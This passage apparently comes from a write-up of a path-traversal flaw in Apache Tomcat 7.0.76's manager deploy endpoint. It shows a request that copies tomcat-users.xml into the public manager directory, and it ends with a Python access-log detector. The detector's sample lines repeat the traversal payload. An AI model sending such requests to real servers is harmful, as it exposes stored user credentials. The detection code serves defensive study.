http://localhost:8080/manager/text/deploy?path=/foo&config=D:/TESTING/Java/run/apache-tomcat-7.0.76/conf/tomcat-users.xml&war=1&version=/../../../../webapps/manager/users
The previous URL would copy the file D:/TESTING/Java/run/apache-tomcat-7.0.76/conf/tomcat-users.xml
to the destination folder http://localhost/manager/ under the name users. As we’ve seen in the previous code snippets, the .xml extension is added to each file that is copied.
The following image shows a browser requesting the target URL directly and the application's response in that case.
As we can see from the previous image, the application response is “FAIL - Failed to deploy application at context path /foo##/../../../../webapps/manager/users”, but the file is copied anyway.
We can confirm that with a direct request for the users.xml file in the webroot of the manager application: http://localhost:8080/manager/users.xml.
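Because the manager answers with a FAIL message even though the file is copied, the request itself is the reliable thing to look for. The following detection check is an added example, not code from the original write-up: it flags access-log entries for `/manager/text/deploy` whose `version` parameter contains path characters or whose `config` parameter points at an XML file under `conf/`. The function name `suspicious_deploy` is hypothetical, and the log lines are constructed samples in the common log format.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request line inside a common/combined-format access log entry.
REQUEST_RE = re.compile(r'"(?:GET|PUT|POST) (\S+) HTTP/[\d.]+"')

def suspicious_deploy(line):
    """Return a list of reasons if the log line is a manager deploy
    request whose parameters match the pattern described above."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    if not url.path.rstrip("/").endswith("/manager/text/deploy"):
        return []
    # parse_qs percent-decodes values, so encoded separators are seen too.
    params = parse_qs(url.query, keep_blank_values=True)
    reasons = []
    for value in params.get("version", []):
        # A version label has no reason to contain ".." or path separators.
        if ".." in value or "/" in value or "\\" in value:
            reasons.append("version contains path characters: " + value)
    for value in params.get("config", []):
        # config naming an XML file inside a conf/ directory.
        if re.search(r"[/\\]conf[/\\][^/\\]+\.xml$", value, re.I):
            reasons.append("config points at a conf/ XML file: " + value)
    return reasons

# Constructed sample log lines (timestamps, sizes and users are made up).
SAMPLE_LOG = [
    '127.0.0.1 - admin [10/Mar/2017:10:00:00 +0100] "GET /manager/text/deploy?path=/foo&config=D:/TESTING/Java/run/apache-tomcat-7.0.76/conf/tomcat-users.xml&war=1&version=/../../../../webapps/manager/users HTTP/1.1" 200 96',
    '127.0.0.1 - admin [10/Mar/2017:10:01:00 +0100] "GET /manager/text/deploy?path=/bar&war=file:/tmp/bar.war&version=1.2 HTTP/1.1" 200 60',
    '127.0.0.1 - admin [10/Mar/2017:10:02:00 +0100] "GET /manager/text/deploy?path=/foo&war=1&version=%2f..%2f..%2fwebapps%2fmanager%2fusers HTTP/1.1" 200 96',
    '127.0.0.1 - - [10/Mar/2017:10:03:00 +0100] "GET /manager/users.xml HTTP/1.1" 200 2100',
]

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        for reason in suspicious_deploy(line):
            print(reason)
```

The check keys on the request parameters rather than the response, since the response text reports a failure in this case.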